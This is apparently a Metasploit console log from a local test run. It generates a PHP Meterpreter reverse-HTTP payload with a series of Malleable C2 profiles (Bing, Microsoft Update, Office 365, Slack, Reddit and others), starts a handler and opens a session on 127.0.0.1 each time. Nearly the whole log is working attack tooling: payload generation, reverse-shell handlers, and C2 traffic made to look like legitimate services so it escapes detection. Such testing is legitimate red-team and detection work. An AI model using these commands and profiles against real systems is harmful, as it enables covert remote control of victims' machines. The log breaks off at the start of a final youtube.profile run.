resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/bingsearch_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/bingsearch_getonly.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60524 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: zu0oid7g) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: zu0oid7g) Redirecting stageless: URI '/search/' with UA 'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko' -> UUID XX7eMhCOHIMSpAGreIvz8wOxPJc6QBdD9AbObOZ5uyCbti-PIVRs_s3pT-
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: zu0oid7g) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: zu0oid7g) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: zu0oid7g) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:57764) at 2026-06-15 13:26:16 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

microsof_update.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/microsoftupdate_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/microsoftupdate_getonly.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60144 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: z1yfve8i) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: z1yfve8i) Redirecting stageless: URI '/c/msdownload/update/others/2016/12/29136388_/bEdaeTRKMjVmOUdtSnJVcHpBbEVVUTgtdzFXUG5YVzJpSjdvbFZ0RG9hNnZ0cktVbkh3QzI4WlpkenZU.cab' with UA 'Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40' -> UUID lGZy4J25f9GmJrUpzAlEtgmVbLiQ4UbWTre5Xo5JzNwezf3oUVipzfgOFt9NtUA-wDiWch4EKQLfljQVifL4kbMJXKAMxz3fJRFEeiKJVmxnORVM0-RQBVbMnKVK
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: z1yfve8i) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: z1yfve8i) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: z1yfve8i) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:45846) at 2026-06-15 13:31:29 +0200

msf payload(php/meterpreter_reverse_http) > sessions =1
[-] Invalid session identifier: 0
msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

mscrl

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/mscrl.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/mscrl.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60352 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: iywfotzp) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: iywfotzp) Redirecting stageless: URI '/pki/mscorp/cps/default.htm' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36' -> UUID qMz78Mxvxd5NVl5ZJ3mpiw9Js6QSVj7FfIw4Ttg
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: iywfotzp) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: iywfotzp) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: iywfotzp) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:52466) at 2026-06-15 13:41:18 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

msnbcvideo_getonly.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/msnbcvideo_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/msnbcvideo_getonly.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60508 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: kpi9ycd7) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: kpi9ycd7) Redirecting stageless: URI '/z/msnbc2_live01@9615/manifest.f4m' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -> UUID hIZK30M3ztHVncaSv7Iw_gWUgOhCjHuqFAmA0tzU9Q06g3QBTzVW
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: kpi9ycd7) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: kpi9ycd7) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: kpi9ycd7) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:40996) at 2026-06-15 13:43:32 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
geComputer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

office365.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/office365_calendar.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/office365_calendar.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60344 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5lwyhjxd) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5lwyhjxd) Redirecting stageless: URI '/owa/' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID uve1kkg80xy_tKy71ZtZ9gPZthed5
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5lwyhjxd) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5lwyhjxd) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 5lwyhjxd) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:46964) at 2026-06-15 13:47:15 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

oscp.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/oscp.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/oscp.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 59972 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 8az396r2) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 8az396r2) Redirecting stageless: URI '/oscp/VCpMmG5pt-NgJHMrCguGqAMtXTY0g29KvW4GfyYHFW7SWw9NVnMaJIriw76z3A3jlZx6XXQlskvymyp1yIjssw3MrcawYG6vyb7OlAFTOsBtWi_ylSaBL-fq3UfqK' with UA 'Microsoft-CryptoAPI/6.1' -> UUID VCpMmG5pt-NgJHMrCguGgw77ZmG9naVhbAgEmXEYGxckMerbCu6XZ75J1ayXZFZ-ZDTgdHGC-MhcyFZzKQAWlxDK-LKEZEE-yF4Wo
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 8az396r2) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 8az396r2) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 8az396r2) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:45946) at 2026-06-15 13:48:56 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms
meterpreter >

reddit.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/reddit.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/reddit.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60588 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 82ti7bwf) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 82ti7bwf) Redirecting stageless: URI '/r/webdev/comments/95ltyr' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' -> UUID ui_FWXJHlzq9ca5-115VdggV4UhLyAWubCEHL-_y32oyxxJf7Gq2yXi9qQIQ1zcwzXlbtS4gSGZkj
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 82ti7bwf) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 82ti7bwf) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 82ti7bwf) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:36096) at 2026-06-15 13:54:47 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

rtmp.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/rtmp.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/rtmp.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60100 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 20kubjzv) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 20kubjzv) Redirecting stageless: URI '/idle/1376547834/1' with UA 'Shockwave Flash' -> UUID wKE-QBWK7-iHPJQz7RNuNwahASDCs5jgUjqpiFikpvgcIo__picTJanhsdGrQDOR-oKQfO74GXn9H1z3QmUfbQdMWRRoNfyWFGhuzuGDiYDJETpaiZpENXe3NNr
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 20kubjzv) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 20kubjzv) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 20kubjzv) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:59920) at 2026-06-15 13:59:08 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms
meterpreter >

slack

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/slack.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/slack.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60432 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242

msf payload(php/meterpreter_reverse_http) > 
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 3swb25zo) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 3swb25zo) Redirecting stageless: URI '/messages/C0527B0NM' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID GaUJ5I5C2liymKGX2LdbHgJrvNoJH28FtCEq4gbhnWn79Ta
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 3swb25zo) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 3swb25zo) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 3swb25zo) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:49484) at 2026-06-15 14:01:11 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

stackoverflow

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/stackoverflow.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/stackoverflow.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60424 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 645q0pry) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 645q0pry) Redirecting stageless: URI '/questions/32251816/c-sharp-directives-compilation-error' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' -> UUID qlDOmOi2_vWNpp6p54lkaQcqBBLAsJSMmUREj_-t-bJGUWUt1cYpcQO_H_qYAKKLnN
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 645q0pry) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 645q0pry) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 645q0pry) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:51188) at 2026-06-15 14:02:23 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

trevor

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/trevor.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/trevor.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60340 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_http) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTP reverse handler on http://127.0.0.1:4242

msf payload(php/meterpreter_reverse_http) > 
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d03g1bwl) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d03g1bwl) Redirecting stageless: URI '/us/ky/louisville/312-s-fourth-st.html' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID clo4NYNSNbVLbVhiIUKhJwKr1NyEcT78JiWRooqDfngFmq_gXVxVZoSOqxbJPessqQ8s6c0xf_jHbRReJALDNk306Dlm_oIGa5uEFb
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d03g1bwl) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d03g1bwl) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d03g1bwl) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:59354) at 2026-06-15 14:04:27 +0200

msf payload(php/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

youtube.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_http
